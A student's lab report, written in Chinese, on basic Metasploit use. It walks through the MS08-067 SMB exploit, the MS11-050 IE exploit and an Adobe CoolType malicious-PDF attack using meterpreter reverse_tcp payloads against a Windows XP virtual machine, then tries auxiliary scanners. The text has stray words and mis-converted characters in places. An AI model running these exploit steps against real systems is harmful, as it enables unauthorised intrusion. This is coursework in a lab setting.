20145238-荆玉茗《网络对抗技术》MSF基础应用

20145238荆玉茗-《网络攻防》-MSF基础应用

实践过程

MS08_067漏洞渗透攻击实践(主动攻击)

实验工具:

  • kali&windows xp
  • 将xp的网络设为NAT模式,再从新分配其ip地址与kali在同一网段,能够看到两台虚拟机能够ping通。

MS08_067远程漏洞攻击

  • 打开msf监听
  • 查找关于ms08_067的渗透模块
    html

  • 使用它有的这个exploit/windows/smb/ms08_067_netapi
  • 显示攻击载荷,能够用这个shell_bind_tcp

    shell

  • show targets看一下能够被攻击的靶机的操做系统
  • 使用set payload generic/shell_reverse_tcp设置攻击有效载荷。
  • 查看当前设置,要将RHOST设置为XP的IP;将LHOST设为kali的IP
    set LHOST "kali Ip" set RHOST "Win xp Ip"
    windows

  • 以后exploit能够获取其shellapi

回到ms08_067_netapi模块界面浏览器

  • 此次将payload设为meterpreterset payload windows/meterpreter/reverse_tcp
  • show options
  • exploit
    一样能够获取靶机权限

IE浏览器渗透攻击——MS11050安全漏洞(针对浏览器)

实验工具:

  • kali&windows xp(使用浏览器为IE7)
  • xp的ip地址为192.168.228.130

实验步骤:

  • 在kali中开启msfconsole
  • 进入该漏洞use windows/browser/ms11_050_mshtml_cobjectelement
  • 可查看信息info以及目标浏览器targets
    安全

  • 设置meterpreter载荷set payload windows/meterpreter/reverse_tcp
  • show options(将LHOST设为kali的IP、set LPORT xxx set URIPATH xxx)
    网络

  • 完成exploitXP访问底下的网址

    session

  • 此时kali中session已建立
    ssh

  • 使用命令sessions -i 1开始链接,并成功获得shell
    tcp

Adobe阅读器渗透攻击

实验工具:

  • kali&Win xp attacker
  • 均设为NAT模式,确保可以ping通。
  • 打开kali中的隐藏文件

实验步骤:

  • 在kali终端中开启msfconsole
  • 进入该漏洞use exploit/windows/fileformat/adobe_cooltype_sing
  • 设置攻击有效载荷set payload windows/meterpreter/reverse_tcp
  • show options

set FILENAME xxx.pdf
set LHOST "KALI Ip"
set LPORT xxxx

  • 设置相关信息

  • 生成其pdf,将pdf拷贝到靶机中

  • 使用命令exploit开始攻击,在xp中打开pdf。
    此时kali中能够看见
    已成功夺权

  • 看看靶机里的tcp链接

应用辅助模块

  • 使用show auxiliary查看辅助模块

  • 我首先选择了这个漏洞,百度以后是进行远程ssl帐号口令的破解。
    首先使用use auxiliary/scanner/ssh/ssh_login

  • 查看其配置信息(还配置了pass.txt,和user.txt)

  • 可是run以后一直出错

(百度说Windows下msf安装好之后,直接把生成好的pass.txt和user.txt放到X:\Program Files\Metasploit\Framework3\msf3\目录下,直接放到c:\下面不行 只能放到msf3目录下,我觉得直接把生成的文件拷贝过去就行,首先我没找到生成的文件...而后我把ip改成kali的,仍是报错)

  • 仍是看一下scanner/http/ssl

  • 咱们更改了目标主机设为同一网段的,再次扫描...未果
    又更改了其线程...仍未果

  • 仍是作最容易的nmap扫面,看看其开放端口吧

  • 仍是不太甘心,又作了一下arp_sweep
    填好其设置信息之后使用run 开始扫描。可看到链接状况。

实验后回答问题

(1)用本身的话解释什么是exploit,payload,encode.

  • exploit:就是发起渗透攻击,当你能够得到靶机shell或者作一些夺权的准备以后的最后一个run。
  • payload就是咱们在作渗透攻击中用到的shellcode,能够破坏程序正常运行的代码。
  • encode假装病毒的一种手段——编码

实验总结与体会

经过本次实验,我首先掌握了经过msf如何查看各类各样的安全漏洞,再经过一个漏洞的分类进行攻击。大体步骤为:

  • 肯定你想尝试的漏洞show auxiliary
  • 搜索该漏洞的模块search xxx(能够看到分别表示的模块类型、目标平台、目标服务、模块名字)
  • show payloads可查看攻击载荷的类型,选择运行后门
  • show options查看配设渗透攻击所须要的配置选项。yes为必须配设的经过set xxx xxxx来配设
  • 重要的一点是这些漏洞都很是具备针对性、因此必定要show targets来看看相应的受害者是啥
  • 配置完各个选项之后再show options确认一下
  • 以后就能够exploit发起进攻。

本次实验难度方面不是特别大,主要考察你虚拟机能不能行,哎,一直在百分之93的状态下作完了实验,最后也分不清0 8 和o 了。。。

相关文章
相关标签/搜索